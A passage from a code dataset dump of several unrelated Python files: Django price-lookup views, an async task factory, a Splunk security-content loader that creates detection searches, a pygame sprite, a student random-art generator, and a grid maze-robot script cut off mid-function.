\"\"\"\n padre = first_or_none(Registry.objects.filter(nombre='PreferenciasEmpresa'))\n if request.user.is_superuser and padre:\n if not Registry.objects.filter(nombre='SIC_ConsultaPrecio_NombreEmpresa').exists():\n Registry.objects.create(nombre='SIC_ConsultaPrecio_NombreEmpresa', tipo='V', padre=padre, valor='')\n if not Registry.objects.filter(nombre='SIC_ConsultaPrecio_Slogan').exists():\n Registry.objects.create(nombre='SIC_ConsultaPrecio_Slogan', tipo='V', padre=padre, valor='')\n if not Registry.objects.filter(nombre='SIC_ConsultaPrecio_Cliente').exists():\n Registry.objects.create(nombre='SIC_ConsultaPrecio_Cliente', tipo='V', padre=padre, valor='')\n using = router.db_for_write(Almacen)\n management.call_command('syncdb', database=using, interactive=False)\n return HttpResponseRedirect('/precios/')\n\n\n@login_required(login_url='/login/')\ndef PreferenciasManageView(request, template_name='django_microsip_consultaprecio/preferencias.html'):\n msg = ''\n form_initial = {'empresa_nombre': Registry.objects.get(nombre='SIC_ConsultaPrecio_NombreEmpresa').get_value(), \n 'empresa_slogan': Registry.objects.get(nombre='SIC_ConsultaPrecio_Slogan').get_value(), \n 'cliente_eventual': Registry.objects.get(nombre='SIC_ConsultaPrecio_Cliente').get_value()}\n form = PreferenciasManageForm(request.POST or None, initial=form_initial)\n warrning = ''\n if form.is_valid():\n form.save()\n msg = 'Datos guardados correctamente'\n imagenes = ImagenSlideChecador.objects.all().order_by('id')\n c = {'form': form, \n 'msg': msg, \n 'imagenes': imagenes}\n return render_to_response(template_name, c, context_instance=RequestContext(request))\n\n\n@login_required(login_url='/login/')\ndef imagen_manageview(request, id=None, template_name='django_microsip_consultaprecio/imagen.html'):\n if id:\n imagen = get_object_or_404(ImagenSlideChecador, pk=id)\n else:\n imagen = ImagenSlideChecador()\n if request.POST:\n form = ImagenManageForm(request.POST or None, request.FILES, 
instance=imagen)\n else:\n form = ImagenManageForm(instance=imagen)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect('/precios/preferencias/')\n else:\n c = {'form': form}\n return render_to_response(template_name, c, context_instance=RequestContext(request))\n\n\ndef eliminarimagen(request, id=None):\n imagen_a_eliminar = ImagenSlideChecador.objects.get(id=id)\n imagen_a_eliminar.delete()\n return HttpResponseRedirect('/precios/preferencias/')","sub_path":"pycfiles/django_microsip_consultaprecio-1.2.0/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"333866151","text":"\"\"\"\nContains business logic tasks for this order of the task factory.\nEach task should be wrapped inside a task closure that accepts a **kargs parameter\nused for task initialization.\n\"\"\"\n\ndef make_task_dict():\n \"\"\"\n Returns a task dictionary containing all tasks in this module.\n \"\"\"\n task_dict = {}\n task_dict[\"capitalize_words\"] = capitalize_closure\n task_dict[\"char_count\"] = char_count_closure\n task_dict[\"combine_words\"] = combine_words_closure\n return task_dict\n\n\ndef get_task(task_name, init_args):\n \"\"\"\n Accesses the task dictionary, returning the task corresponding to a given key,\n wrapped in a closure containing the task and its arguments.\n \"\"\"\n tasks = make_task_dict()\n return tasks[task_name](init_args)\n\n\ndef capitalize_closure(init_args):\n \"\"\"\n A closure around the example function which is an endpoint in the task factory.\n \"\"\"\n init_args = init_args\n async def capitalize_words(words_map):\n \"\"\"\n A simple function to illustrate use of the task factory pattern.\n \"\"\"\n words = words_map[\"strings\"]\n capitalized_words = [word.upper() for word in words]\n return {\"strings\": capitalized_words}\n return capitalize_words\n\n\ndef char_count_closure(init_args):\n \"\"\"\n A closure 
around the example function which is an endpoint in the task factory.\n \"\"\"\n init_args = init_args\n async def char_count(words_map):\n \"\"\"\n A simple function to illustrate use of the task factory pattern.\n \"\"\"\n words = words_map[\"strings\"]\n word_length = [len(word) for word in words]\n return {\"lengths\": word_length}\n return char_count\n\n\ndef combine_words_closure(init_args):\n \"\"\"\n A closure around the example function which is an endpoint in the task factory.\n \"\"\"\n combine_keys = init_args[\"dict_keys\"]\n final_key = init_args[\"final_key\"]\n async def combine_words(words_map):\n \"\"\"\n A simple function to illustrate use of the task factory pattern.\n \"\"\"\n return_dict = {final_key: \"\"}\n for combine_key in combine_keys:\n return_dict[final_key] += words_map[combine_key]\n return return_dict\n return combine_words\n","sub_path":"ephemeral/tasks/src/main/strings/operations/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"199741660","text":"import requests\nimport json\nimport splunk.mining.dcutils\nimport time\nimport re\nimport requests\nimport os\n\nclass ASXLib:\n logger = splunk.mining.dcutils.getLogger()\n\n def __init__(self, service, api_url):\n self.service = service\n if api_url.endswith('/'):\n self.api_url = api_url[:-1]\n else:\n self.api_url = api_url\n\n def list_analytics_stories(self):\n url = self.api_url + '/stories'\n response = self.__call_security_content_api(url)\n self.logger.info(\"asx_lib.py - listing stories - {0}\\n\".format(response))\n return response['stories']\n\n\n def get_analytics_story(self, name):\n\n if name == 'All':\n url = self.api_url + '/stories'\n else:\n url = self.api_url + '/stories/' + name\n\n response = self.__call_security_content_api(url)\n\n self.__generate_standard_macros(self.service)\n\n for story in response['stories']:\n for detection in 
story['detections']:\n if 'macros' in detection:\n for macro in detection['macros']:\n self.logger.info(\"asx_lib.py - generate macros.conf for: {0}\".format(macro['name']))\n self.__generate_macro(self.service, macro)\n\n if 'lookups' in macro:\n for lookup in macro['lookups']:\n self.__generate_lookup(self.service, lookup)\n\n self.logger.info(\"asx_lib.py - generate savedsearches.conf for detection: {0}\".format(detection['name']))\n kwargs = self.__generate_detection(self.service, detection)\n\n if 'baselines' in detection:\n for baseline in detection['baselines']:\n self.logger.info(\"asx_lib.py - generate savedsearches.conf for baseline: {0}\".format(baseline['name']))\n self.__generate_baseline(self.service, baseline)\n\n if 'lookups' in baseline:\n for lookup in baseline['lookups']:\n self.__generate_lookup(self.service, lookup)\n\n if 'lookups' in detection:\n for lookup in detection['lookups']:\n self.__generate_lookup(self.service, lookup)\n\n return 0\n\n\n\n def schedule_analytics_story(self, name, earliest_time, latest_time, cron_schedule):\n search_name = []\n\n for search in self.service.saved_searches:\n if 'action.escu.analytic_story' in search:\n if name in search['action.escu.analytic_story']:\n if search['action.escu.search_type'] == \"support\":\n query = search['search']\n self.logger.info(\"asx_lib.py - schedule baseline - {} - {}\\n\".format(search['action.escu.full_search_name'], query))\n self.logger.info(\"asx_lib.py - schedule baseline earliest_time latest_time - {} - {}\\n\".format(earliest_time, latest_time))\n kwargs = {\"disabled\": \"false\",\n \"is_scheduled\": True,\n \"cron_schedule\": cron_schedule,\n \"dispatch.earliest_time\": earliest_time,\n \"dispatch.latest_time\": latest_time,\n \"search\": search['search']\n }\n search.update(**kwargs).refresh()\n search_name.append(search['action.escu.full_search_name'])\n\n if search['action.escu.search_type'] == \"detection\":\n mappings = json.loads(search['action.escu.mappings'])\n 
if \"| collect\" in search['search']:\n query = search['search'].split(\"| collect\",1)[0]\n else:\n query = search['search']\n\n if \"mitre_attack\" in mappings:\n query = query + ' | collect index=asx sourcetype=asx marker=\"mitre_id=' + mappings[\"mitre_attack\"][0] + ', execution_type=scheduled\"'\n else:\n query = query + ' | collect index=asx sourcetype=asx marker=\"execution_type=scheduled\"'\n\n self.logger.info(\"asx_lib.py - schedule detection - {} - {}\\n\".format(search['action.escu.full_search_name'], query))\n self.logger.info(\"asx_lib.py - schedule detection earliest_time latest_time - {} - {}\\n\".format(earliest_time, latest_time))\n kwargs = {\"disabled\": \"false\",\n \"is_scheduled\": True,\n \"cron_schedule\": cron_schedule,\n \"dispatch.earliest_time\": earliest_time,\n \"dispatch.latest_time\": latest_time,\n \"search\": query\n }\n search.update(**kwargs).refresh()\n search_name.append(search['action.escu.full_search_name'])\n\n return search_name\n\n\n def run_analytics_story(self, name, earliest_time, latest_time):\n search_name = []\n execution_time = str(time.time())\n saved_searches = []\n\n for search in self.service.saved_searches:\n if 'action.escu.analytic_story' in search:\n if name in search['action.escu.analytic_story']:\n if search['action.escu.search_type'] == \"support\":\n saved_searches.insert(0,search)\n else:\n saved_searches.append(search)\n\n for search in saved_searches:\n if search['action.escu.search_type'] == \"support\":\n query = search['search']\n self.logger.info(\"asx_lib.py - run baseline - {} - {}\\n\".format(search['action.escu.full_search_name'],query))\n kwargs = { \"exec_mode\": \"blocking\",\n \"disabled\": False,\n \"dispatch.earliest_time\": earliest_time,\n \"dispatch.latest_time\": latest_time}\n jobs = self.service.jobs\n job = jobs.create(query, **kwargs)\n search_name.append(search['action.escu.full_search_name'])\n\n #Running Detections\n if search['action.escu.search_type'] == \"detection\":\n\n 
mappings = json.loads(search['action.escu.mappings'])\n if \"| collect\" in search['search']:\n query = search['search'].split(\"| collect\",1)[0]\n else:\n query = search['search']\n\n if \"mitre_attack\" in mappings:\n query = query + ' | collect index=asx sourcetype=asx marker=\"mitre_id=' + mappings[\"mitre_attack\"][0] + ', execution_type=adhoc, execution_time=' + execution_time + '\"'\n else:\n query = query + ' | collect index=asx sourcetype=asx marker=\"execution_type=adhoc, execution_time=' + execution_time + '\"'\n\n self.logger.info(\"asx_lib.py - run detection - {} - {}\\n\".format(search['action.escu.full_search_name'], query))\n\n kwargs = { \"disabled\": False,\n \"dispatch.earliest_time\": earliest_time,\n \"dispatch.latest_time\": latest_time,\n \"search\": query}\n\n search.update(**kwargs).refresh()\n job = search.dispatch()\n search_name.append(search['action.escu.full_search_name'])\n\n return search_name\n\n def __call_security_content_api(self, url):\n resp = requests.get(url)\n if resp.status_code != 200:\n # this is only temporary, needs to be fixed in API\n #raise requests.HTTPError('Error {} by calling {}'.format(resp.status_code, url))\n return 0\n else:\n # this is only temporary, needs to be fixed in API\n return resp.json()\n\n def __generate_macro(self, service, macro):\n if not (macro['name'] == 'security_content_ctime' or macro['name'] == 'security_content_summariesonly'):\n service.post('properties/macros', __stanza=macro['name'])\n service.post('properties/macros/' + macro['name'], definition=macro['definition'], description=macro['description'])\n\n def __generate_standard_macros(self, service):\n service.post('properties/macros', __stanza=\"security_content_ctime(1)\")\n service.post('properties/macros/security_content_ctime(1)', definition='convert timeformat=\"%m/%d/%Y %H:%M:%S\" ctime($field$)', description='convert epoch time to string', args='field')\n\n service.post('properties/macros', 
__stanza=\"security_content_summariesonly\")\n service.post('properties/macros/security_content_summariesonly', definition='summariesonly=true allow_old_summaries=true', description=\"search data models summaries only\", args='field')\n\n def __generate_lookup(self, service, lookup):\n kwargs = {}\n if 'filename' in lookup:\n if not os.path.exists('/opt/splunk/var/run/splunk/lookup_tmp'):\n os.makedirs('/opt/splunk/var/run/splunk/lookup_tmp')\n url = 'https://security-content.s3-us-west-2.amazonaws.com/lookups/' + lookup['filename']\n r = requests.get(url, allow_redirects=True)\n lookup_table_file_path = '/opt/splunk/var/run/splunk/lookup_tmp/' + lookup['filename']\n open(lookup_table_file_path, 'wb').write(r.content)\n kwargs2 = {}\n kwargs2.update({\"eai:data\": lookup_table_file_path})\n kwargs2.update({\"name\": lookup['filename']})\n service.post('data/lookup-table-files', **kwargs2)\n kwargs.update({\"filename\": lookup['filename']})\n else:\n kwargs.update({\"collection\": lookup['collection']})\n kwargs.update({\"external_type\": 'kvstore'})\n if 'default_match' in lookup:\n kwargs.update({\"default_match\": lookup['default_match']})\n if 'case_sensitive_match' in lookup:\n kwargs.update({\"case_sensitive_match\": lookup['case_sensitive_match']})\n if 'description' in lookup:\n kwargs.update({\"description\": lookup['description']})\n if 'match_type' in lookup:\n kwargs.update({\"match_type\": lookup['match_type']})\n if 'max_matches' in lookup:\n kwargs.update({\"max_matches\": lookup['max_matches']})\n if 'min_matches' in lookup:\n kwargs.update({\"min_matches\": lookup['min_matches']})\n if 'fields_list' in lookup:\n kwargs.update({\"fields_list\": lookup['fields_list']})\n if 'filter' in lookup:\n kwargs.update({\"filter\": lookup['filter']})\n\n try:\n service.post('properties/transforms', __stanza=lookup['name'])\n service.post('properties/transforms/' + lookup['name'], **kwargs)\n except Exception as e:\n self.logger.error(\"Failed to store lookup \" 
+ lookup['name'] + \" with error: \" + str(e))\n\n\n def __generate_baseline(self, service, baseline):\n full_search_name = str(\"ESCU - \" + baseline['name'])\n resp = service.saved_searches.list()\n\n # if there are detections with the same name, don't override\n if not any(x.name == full_search_name for x in resp):\n kwargs = {}\n kwargs.update({\"action.escu\": \"0\"})\n kwargs.update({\"action.escu.enabled\": \"1\"})\n kwargs.update({\"action.escu.search_type\": \"support\"})\n kwargs.update({\"action.escu.full_search_name\": full_search_name})\n kwargs.update({\"description\": baseline['description']})\n kwargs.update({\"action.escu.creation_date\": baseline['date']})\n kwargs.update({\"action.escu.modification_date\": baseline['date']})\n\n if 'analytics_story' in baseline['tags']:\n kwargs.update({\"action.escu.analytic_story\": json.dumps(baseline['tags']['analytics_story'])})\n\n correlation_rule = baseline['search']\n\n kwargs.update({\"cron_schedule\": \"*/30 * * * *\" })\n kwargs.update({\"dispatch.earliest_time\": \"-30m\" })\n kwargs.update({\"dispatch.latest_time\": \"now\" })\n kwargs.update({\"action.escu.eli5\": baseline['description']})\n\n if 'how_to_implement' in baseline:\n kwargs.update({\"action.escu.how_to_implement\": baseline['how_to_implement']})\n else:\n kwargs.update({\"action.escu.how_to_implement\": \"none\"})\n\n if 'known_false_positives' in baseline:\n kwargs.update({\"action.escu.known_false_positives\": baseline['known_false_positives']})\n else:\n kwargs.update({\"action.escu.known_false_positives\": \"None\"})\n\n kwargs.update({\"disabled\": \"true\"})\n kwargs.update({\"schedule_window\": \"auto\"})\n kwargs.update({\"is_visible\": \"false\"})\n\n query = baseline['search']\n query = query.encode('ascii', 'ignore').decode('ascii')\n\n search = full_search_name\n search = search.encode('ascii', 'ignore').decode('ascii')\n\n try:\n savedsearch = service.saved_searches.create(search, query, **kwargs)\n except Exception as 
e:\n self.logger.error(\"Failed to store detection \" + baseline['name'] + \" with error: \" + str(e))\n\n\n def __generate_detection(self, service, detection):\n\n full_search_name = str(\"ESCU - \" + detection['name'] + \" - Rule\")\n resp = service.saved_searches.list()\n\n keys = ['mitre_attack', 'kill_chain_phases', 'cis20', 'nist']\n mappings = {}\n for key in keys:\n if key == 'mitre_attack':\n if 'mitre_attack_id' in detection['tags']:\n mappings[key] = detection['tags']['mitre_attack_id']\n else:\n if key in detection['tags']:\n mappings[key] = detection['tags'][key]\n detection['mappings'] = mappings\n\n data_model = self.parse_data_models_from_search(detection['search'])\n if data_model:\n detection['data_model'] = data_model\n\n nes_fields = self.get_nes_fields(detection['search'])\n if len(nes_fields) > 0:\n detection['nes_fields'] = nes_fields\n\n # if there are detections with the same name, don't override\n if not any(x.name == full_search_name for x in resp):\n kwargs = {}\n kwargs.update({\"action.escu\": \"0\"})\n kwargs.update({\"action.escu.enabled\": \"1\"})\n kwargs.update({\"description\": detection['description'] })\n kwargs.update({\"action.escu.mappings\": json.dumps(detection['mappings']) })\n if 'data_model' in detection:\n kwargs.update({\"action.escu.data_models\": json.dumps(detection['data_model']) })\n kwargs.update({\"action.escu.eli5\": detection['description'] })\n if 'how_to_implement' in detection:\n kwargs.update({\"action.escu.how_to_implement\": detection['how_to_implement'] })\n else:\n kwargs.update({\"action.escu.how_to_implement\": \"none\"})\n if 'known_false_positives' in detection:\n kwargs.update({\"action.escu.known_false_positives\": detection['known_false_positives'] })\n else:\n kwargs.update({\"action.escu.known_false_positives\": \"None\"})\n kwargs.update({\"action.escu.creation_date\": detection['date'] })\n kwargs.update({\"action.escu.modification_date\": detection['date'] })\n 
kwargs.update({\"action.escu.confidence\": \"high\" })\n kwargs.update({\"action.escu.full_search_name\": full_search_name })\n kwargs.update({\"action.escu.search_type\": \"detection\"})\n kwargs.update({\"action.escu.providing_technologies\": \"[]\" })\n\n if 'analytics_story' in detection['tags']:\n kwargs.update({\"action.escu.analytic_story\": json.dumps(detection['tags']['analytics_story']) })\n\n kwargs.update({\"cron_schedule\": \"*/30 * * * *\" })\n kwargs.update({\"dispatch.earliest_time\": \"-30m\" })\n kwargs.update({\"dispatch.latest_time\": \"now\" })\n kwargs.update({\"action.correlationsearch\": \"1\"})\n kwargs.update({\"action.correlationsearch.enabled\": \"1\"})\n kwargs.update({\"action.correlationsearch.label\": full_search_name })\n kwargs.update({\"schedule_window\": \"auto\"})\n kwargs.update({\"action.notable\": \"1\"})\n if 'nes_fields' in detection:\n kwargs.update({\"action.notable.param.nes_fields\": detection['nes_fields'] })\n\n kwargs.update({\"action.notable.param.rule_description\": detection['description'] })\n kwargs.update({\"action.notable.param.rule_title\": full_search_name })\n kwargs.update({\"action.notable.param.security_domain\": detection['tags']['security_domain'] })\n kwargs.update({\"action.notable.param.severity\": \"high\" })\n kwargs.update({\"alert.track\": \"1\"})\n kwargs.update({\"action.escu.earliest_time_offset\": \"3600\"})\n kwargs.update({\"action.escu.latest_time_offset\": \"86400\"})\n kwargs.update({\"is_scheduled\": \"1\"})\n kwargs.update({\"alert_type\": \"number of events\"})\n kwargs.update({\"alert_comparator\": \"greater than\"})\n kwargs.update({\"alert_threshold\": \"0\"})\n #kwargs.update({\"realtime_schedule\": \"0\"})\n kwargs.update({\"disabled\": \"true\"})\n kwargs.update({\"is_visible\": \"false\"})\n\n query = detection['search']\n query = query.encode('ascii', 'ignore').decode('ascii')\n\n search = full_search_name\n search = search.encode('ascii', 'ignore').decode('ascii')\n\n try:\n 
savedsearch = service.saved_searches.create(search, query, **kwargs)\n except Exception as e:\n self.logger.error(\"Failed to store detection \" + detection['name'] + \" with error: \" + str(e))\n\n\n\n\n def get_nes_fields(self, search):\n nes_fields_matches = []\n match_obj = ['user', 'dest', 'src']\n for field in match_obj:\n if (search.find(field + ' ') != -1):\n nes_fields_matches.append(field)\n\n return nes_fields_matches\n\n\n def parse_data_models_from_search(self, search):\n match = re.search(r'from\\sdatamodel\\s?=\\s?([^\\s.]*)', search)\n if match is not None:\n return match.group(1)\n return False\n","sub_path":"bin/asx_lib.py","file_name":"asx_lib.py","file_ext":"py","file_size_in_byte":18808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"398210095","text":"# 障碍类\nimport pygame\nfrom Setting import Setting\n\n\nclass Enemy(pygame.sprite.Sprite):\n\n def __init__(self, img, init_pos):\n pygame.sprite.Sprite.__init__(self)\n self.image = img\n self.rect = self.image.get_rect()\n self.rect.topleft = init_pos\n self.speed = 2\n self.borld = Setting().windows\n\n def update(self):\n self.rect.top += self.speed\n\n if self.rect.top > self.borld[1]:\n self.kill()\n","sub_path":"Enemy.py","file_name":"Enemy.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441863294","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 11 11:34:57 2014\n\n@author: pruvolo and ddiggins\n\"\"\"\n\n# you do not have to use these particular modules, but they may help\n#(The are super helpful)\n\n\nfrom random import *\nimport Image\nfrom math import *\n\n\n## SS: Great job in general!! I would say, unless your '#' comments help you understand what's going\n## on, you probably don't need as much as you've put in this assignment. 
If you have a good \n## doc string and variable names, the amount of commenting you need to do is not much. \n\ndef build_random_function(min_depth, max_depth):\n \"\"\"Takes a minimum and maximum nesting depth and returns a randomly\n generated function comprised of sin_pi, cos_pi, prod, sqr, avg, x, and y\"\"\"\n \n xylist = [\"x\", \"y\"] #Creates a list of just x and y for use if max_depth <= 1\n \n if max_depth <= 1:\n return xylist[randint(0,1)] #Jumps right to x and y values of max_depth has been reached or somehow exceeded\n \n recurse1 = build_random_function(min_depth-1, max_depth-1) #a and b are assigned values for nesting\n recurse2 = build_random_function(min_depth-1, max_depth-1)\n \n product = [\"prod\",recurse1,recurse2] #Calculates the product of two values\n sin = [\"sin_pi\",recurse1] #Calculates the sine in radians of a value times pi\n cos = [\"cos_pi\",recurse1] #Calculates the cosine in radians of a value times pi\n square = [\"sqr\",recurse1] #Calculates the square of a signle value\n cube = [\"cube\",recurse2] #Calculates the average of two values\n x = recurse1 #Inserts a single value\n y = recurse2 #Inserts a single value\n \n functions = [product, sin, cos, square, cube, x, y] #groups above functions into a readable list\n \n if min_depth > 1: #If min_depth has not been reached, x and y cannot be called\n lists = functions[randrange(0, 4)]\n elif min_depth <= 1: #x and y can be called randomly after min_depth has been reached\n lists = functions[randrange(0, len(functions))]\n \n return lists #returns the big function list\n\n\n## SS: It might be a good idea to put all of your 'execution' code in a main function at the end\n## of this file\nbuiltfunc = build_random_function(3, 7)\n\n\n## SS: Passed my tests :)\ndef evaluate_random_function(builtfunction, x, y):\n \"\"\"Evaluates the random function generated in build_random_function.\n f = the input function from build_random_function\n [x, y] = floats in the range of [-1, 1]\n \"\"\"\n 
\n xylist = [x, y] #Creates a smilar list to build_random_function, but uses the actual x and y values\n \n #There are just so many if statements\n \n if builtfunction[0] == 'prod':\n return evaluate_random_function(builtfunction[1], x, y)*evaluate_random_function(builtfunction[2], x, y) #Computes the product of the next two values if the first value in the list indicates a product\n \n elif builtfunction[0] == 'sin_pi':\n return sin(pi * evaluate_random_function(builtfunction[1], x, y)) #Computes sine(pi * a) where a is the next value in the built function\n \n elif builtfunction[0] == 'cos_pi':\n return cos(pi * evaluate_random_function(builtfunction[1], x, y)) #Compues cos(pi * a) where a is the next value in the built function\n\n elif builtfunction[0] == 'sqr':\n return evaluate_random_function(builtfunction[1], x, y)**2 #Returns the square of the next value of the built function\n\n elif builtfunction[0] == 'cube':\n return (evaluate_random_function(builtfunction[1], x, y)**3) #Returns the cube of the next value of built function if the first is 'cube'\n\n elif builtfunction[0] == 'x':\n return xylist[0] #Returns the value of x at the maximum depth of builtfunction\n\n elif builtfunction[0] == 'y':\n return xylist[1] #Returns the value of y at the maximum depth of builtfunction\n \nevalfunc = evaluate_random_function(builtfunc, -.02435, .93425)\n\n## SS: Passed my tests :)\ndef remap_interval(val, input_interval_start, input_interval_end, output_interval_start, output_interval_end):\n \"\"\" Maps the input value that is in the interval [input_interval_start, input_interval_end]\n to the output interval [output_interval_start, output_interval_end]. The mapping\n is an affine one (i.e. output = input*c + b).\n \n The output of the function is determined by calculatioing the ratio between the \n first interval and the distance from the interval start to val. 
This ratio is\n multiplied by the length of the second interval and added to the value of the output interval's\n starting value.\n \"\"\"\n \n length = input_interval_end-input_interval_start #Calculates difference between start and end of input interval\n \n dist_from_start = val - input_interval_start #Calculates distance between val and start of input interval\n \n ratio = dist_from_start/float(length) #Establishes a ratio of this \n \n length2 = output_interval_end - output_interval_start #Multiplies this ratio by the length of the output interval\n \n value = output_interval_start + length2 * ratio #Calculates a value by multiplying length2 by ratio and adding the start value of the output interval\n \n return value\n\n#print remap_interval(evalfunc, -1, 1, 0, 255)\n\ndef draw_picture():\n \"\"\"Calling build_random_function, evaluate_random_function, and remap_interval,\n creates and saves an image produced by mapping RGB values to individual pixels in an image.\n \"\"\"\n im = Image.new(\"RGB\", (350, 350),\"black\") #Creates a 350px square image\n \n pixels = im.load() #Creates a pixel array\n \n red = build_random_function(6, 15) #Builds RGB functions from build_random_functions\n blue = build_random_function(1, 7) #I chose these depth values because they made me happy\n green = build_random_function(5, 10) #OverlyHonestMethods\n \n\n for xpixel in range(0, 349):\n for ypixel in range(0, 349): #Traverses every xpixel and ypixel\n xpix = remap_interval(xpixel, 0, 349, -1, 1) #Remaps x and y pixels to a -1, 1 range for use in evaluate_random_function\n ypix = remap_interval(ypixel, 0, 349, -1, 1)\n \n redchannel = evaluate_random_function(red, xpix, ypix) #Determines x and y values of functions from xpix and ypix\n bluechannel = evaluate_random_function(blue, xpix, ypix)\n greenchannel = evaluate_random_function(green, xpix, ypix)\n \n redchannel = int(remap_interval(redchannel, -1, 1, 0, 255)) #Converts channels to inegers for plotting\n bluechannel = 
int(remap_interval(bluechannel, -1, 1, 0, 255))\n greenchannel = int(remap_interval(greenchannel, -1, 1, 0, 255))\n \n pixels[xpixel, ypixel] = (redchannel, bluechannel, greenchannel) #Plots tuple for every pixel\n \n im.save(\"Image10.png\") #Ka-save!\n\ndraw_picture() #I am sorry that my comments got less serious as I got more tired\n ","sub_path":"hw4/random_art.py","file_name":"random_art.py","file_ext":"py","file_size_in_byte":7010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"149622385","text":"#Use this space to test code alongside lessons\n\n#age = input(\"What is your age? \")\n#print age\n\n'''\ncount = 13\n\ndef printer(count):\n while count != 0:\n count = count - 1\n print(\"hi\")\n\nprinter(count)\n'''\n\n#def product(num1, num2):\n# return num1 * num2\nitems = ['a','b','c','STOP','d']\n\ndef loopy(items):\n for index, item in enumerate(items):\n if item == 'STOP':\n break\n else:\n print(str(item))\n\nloopy(items)\n","sub_path":"tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"200244140","text":"# This script creates a grid with 20x15 cells.\n\nimport pygame\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nYELLOW = (255, 255, 0)\nGREY = (128, 128, 128)\nORANGE = (255,165,0)\n\n# This sets the WIDTH and HEIGHT of each grid location\nWIDTH = 20\nHEIGHT = 20\n\n# This sets the margin between each cell\nMARGIN = 3\n\nROWS = 20\nCOLUMNS = 15\n\n# Grid is an array of cells of the maze.\ngrid = []\n\n\nclass Cell:\n def __init__(self, row_, column_, explored):\n self.obstacle = 0\n self.virtual_wall = 0\n self.explored = explored\n self.row = row_\n self.column = column_\n\n\nclass Robot:\n def __init__(self):\n self.row = 18\n self.column = 1\n self.direction = \"E\"\n\n\nfor row in range(ROWS):\n grid.append([])\n for 
column in range(COLUMNS):\n cell = Cell(row, column, 0)\n grid[row].append(cell) # Append a cell\n\nrobot = Robot()\ngrid[9][1].obstacle = 1\n\ngrid[14][3].obstacle = 1\ngrid[14][4].obstacle = 1\ngrid[14][5].obstacle = 1\ngrid[15][5].obstacle = 1\n\ngrid[3][4].obstacle = 1\ngrid[4][4].obstacle = 1\ngrid[5][4].obstacle = 1\n\ngrid[0][8].obstacle = 1\n\ngrid[9][6].obstacle = 1\ngrid[9][7].obstacle = 1\n\ngrid[5][9].obstacle = 1\ngrid[5][10].obstacle = 1\ngrid[5][11].obstacle = 1\ngrid[5][12].obstacle = 1\ngrid[5][13].obstacle = 1\ngrid[5][14].obstacle = 1\n\ngrid[14][11].obstacle = 1\ngrid[15][11].obstacle = 1\ngrid[16][11].obstacle = 1\ngrid[17][11].obstacle = 1\n\n\ndef update_explored_cells(robot_, grid_):\n row_ = robot_.row\n column_ = robot_.column\n \n for i in range(row_ - 1, row_ + 2):\n for j in range(column_ - 1, column_ + 2):\n grid_[i][j].explored = 1\n\n\ndef robot_movement(robot_):\n row_ = robot_.row\n column_ = robot_.column\n \n if robot_.direction == \"N\":\n robot_.row -= 1\n \n elif robot_.direction == \"S\":\n robot_.row += 1\n \n elif robot_.direction == \"E\":\n robot_.column += 1\n\n elif robot_.direction == \"W\":\n robot_.column -= 1\n \n else:\n pass\n\n\ndef update_robot_dir(robot_):\n if check_right(robot_):\n if robot_.direction == \"E\":\n robot_.direction = \"S\"\n \n elif robot_.direction == \"N\":\n robot_.direction = \"E\"\n \n elif robot_.direction == \"W\":\n robot_.direction = \"N\"\n\n elif robot_.direction == \"S\":\n robot_.direction = \"W\"\n \n elif check_forward(robot_):\n pass\n\n elif check_left(robot_):\n if robot_.direction == \"E\":\n robot_.direction = \"N\"\n \n elif robot_.direction == \"N\":\n robot_.direction = \"W\"\n \n elif robot_.direction == \"W\":\n robot_.direction = \"S\"\n\n elif robot_.direction == \"S\":\n robot_.direction = \"E\"\n\n else:\n if robot_.direction == \"E\":\n robot_.direction = \"W\"\n \n elif robot_.direction == \"N\":\n robot_.direction = \"S\"\n \n elif robot_.direction == \"W\":\n 
robot_.direction = \"E\"\n\n elif robot_.direction == \"S\":\n robot_.direction = \"N\"\n\n\ndef check_right(robot_):\n row_ = robot_.row\n column_ = robot_.column\n \n if robot_.direction == \"N\":\n if column_ != COLUMNS-2 and check_obs_east(row_, column_):\n return True\n\n elif robot_.direction == \"S\":\n if column_ != 1 and check_obs_west(row_, column_):\n return True\n\n elif robot_.direction == \"E\":\n if row_ != ROWS-2 and check_obs_south(row_, column_):\n return True\n\n elif robot_.direction == \"W\":\n if row_ != 1 and check_obs_north(row_, column_):\n return True\n\n return False\n\n\ndef check_forward(robot_):\n row_ = robot_.row\n column_ = robot_.column\n \n if robot_.direction == \"N\": \n if row_ != 1 and check_obs_north(row_, column_):\n return True\n\n elif robot_.direction == \"S\":\n if row_ != ROWS-2 and check_obs_south(row_, column_):\n return True\n\n elif robot_.direction == \"E\":\n if column_ != COLUMNS-2 and check_obs_east(row_, column_):\n return True\n\n elif robot_.direction == \"W\":\n if column_ != 1 and check_obs_west(row_, column_):\n return True\n\n return False\n\n\ndef check_left(robot_):\n row_ = robot_.row\n column_ = robot_.column\n \n if robot_.direction == \"N\":\n if column_ != 1 and check_obs_west(row_, column_):\n return True\n\n elif robot_.direction == \"S\":\n if column_ != COLUMNS-2 and check_obs_east(row_, column_):\n return True\n\n elif robot_.direction == \"E\":\n if row_ != 1 and check_obs_north(row_, column_):\n return True\n\n elif robot_.direction == \"W\":\n if row_ != ROWS-2 and check_obs_south(row_, column_):\n return True\n\n return False\n\n\ndef check_obs_north(row_, column_):\n if (grid[row_ - 2][column_].obstacle, grid[row_ - 2][column_ + 1].obstacle, grid[row_ - 2][column_ - 1].obstacle) == (0, 0, 0):\n return True\n\n return False\n\n\ndef check_obs_south(row_, column_):\n if (grid[row_ + 